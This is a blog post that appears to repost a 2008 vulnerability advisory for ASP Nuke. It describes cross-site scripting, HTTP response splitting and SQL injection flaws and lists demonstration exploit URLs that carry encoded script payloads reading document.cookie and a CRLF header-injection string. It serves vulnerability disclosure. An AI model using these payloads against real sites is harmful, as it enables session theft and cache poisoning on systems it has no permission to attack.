Friday, August 15, 2008

ASP Nuke Input Validation Holes Permit SQL Injection

Several vulnerabilities were reported in ASP Nuke. A remote user can conduct SQL injection, cross-site scripting, and HTTP response splitting attacks.

The 'forgot_password.asp' script does not properly validate user-supplied input in the 'email' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the ASP Nuke software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.


A demonstration exploit URL is provided:

http://[target]/module/account/register/forgot_password.asp?email=%22
%3E%3Cscript%3Ealert(document.cookie)%3 C/script%3E

The 'register.asp' script is also affected in several parameters, as shown in the following demonstration exploit URLs:

http://[target]/module/account/register/register.asp?FirstName=%22%3E
%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register /register.asp?LastName=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Username=%22%3E%
3Cscript%3Ealert( document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Password=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/ module/account/register/register.asp?Address1=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Address2=%22 %3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?City=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E


http://[target]/module/account/register/register.asp?ZipCode=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/registe r.asp?Email=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

The 'language_select.asp' script does not properly validate user-supplied input in the 'LangCode' parameter. A remote user can submit a specially crafted URL to cause the target server to return a split response. A remote user can exploit this to spoof content on the target server, attempt to poison any intermediate web caches, or conduct cross-site scripting attacks.

A demonstration exploit URL is provided:

http://[target]/module/support/language/language_select.asp?action=go
&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue

The 'comment_post.asp' script does not properly validate user-supplied input in the 'TaskID' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

The vendor has been notified.

Alberto Trivero reported this vulnerability.
Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the ASP Nuke software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

A remote user can create a URL that, when loaded by the target user, will cause arbitrary content to be displayed.

A remote user may be able to poison any intermediate web caches with arbitrary content.


No comments:

Post a Comment